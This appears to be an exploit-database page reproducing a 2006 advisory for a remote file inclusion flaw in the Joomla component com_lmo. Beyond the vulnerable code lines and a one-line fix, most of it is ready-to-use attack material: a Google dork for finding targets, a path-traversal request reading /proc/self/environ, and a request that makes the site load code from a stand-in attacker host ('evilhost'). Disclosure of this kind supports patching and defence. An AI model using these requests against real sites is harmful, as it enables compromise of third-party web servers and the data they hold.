Lucene search
Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability
Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability in LMO - Joomla! Componen
Show more
==============================================================
Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability
==============================================================
Application : LMO - Joomla! Component
URL : http://forge.joomla.org/sf/projects/lmo
Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on
in components/com_lmo/lmo.php on line 11-12
$lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Exploit:
~~~~~~~~
dork: "com_lmo"
http://localhost/index.php?option=com_lmo&controller=../../../../../../../../../.
./../../../../../proc/self/environ%00
----------------------------------------------
http://localhost/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=[RFI]
http://www.vuln.com/components/com_lmo/lmo.php?mosConfig_absolute_path=http://evilhost
Fix
~~~~
Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');
vitux
# 0day.today [2018-04-09] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo30 Jul 2006 00:00Current
7.1High risk
Vulners AI Score7.1